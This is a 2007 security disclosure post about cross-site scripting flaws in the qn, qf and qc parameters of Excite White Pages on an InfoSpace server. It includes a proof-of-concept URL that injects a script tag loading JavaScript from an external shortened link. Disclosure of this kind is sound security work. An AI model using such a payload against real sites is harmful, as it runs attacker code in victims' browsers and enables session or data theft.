MOSEB-29 Bonus: Vulnerabilities in Excite White Pages
22:32 29.06.2007New bonus vulnerabilities in Excite. In this case vulnerabilities at other domain, than in MOSEB-29: Vulnerabilitiy at money.excite.com.
The vulnerability is at Excite White Pages (kevdb.infospace.com) which located on server of InfoSpace (Excite’s partner). These Cross-Site Scripting holes I found 31.05.2007.
XSS:
The vulnerabilities are in qn, qf and qc parameters:
http://kevdb.infospace.com/info.xcite/wp/results/kevdb?OTMPL=%2Fwp%2Fresults.htm&QN=%3Cscript%20src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E&KCFG=US
Moral: seeking in white pages can be dangerous.
Note, that Excite engine belongs to IAC Search & Media. So Ask.com also responsible for these vulnerabilities.
Also note, that Excite White Pages engine use InfoSpace engine. So InfoSpace also responsible for these vulnerabilities.
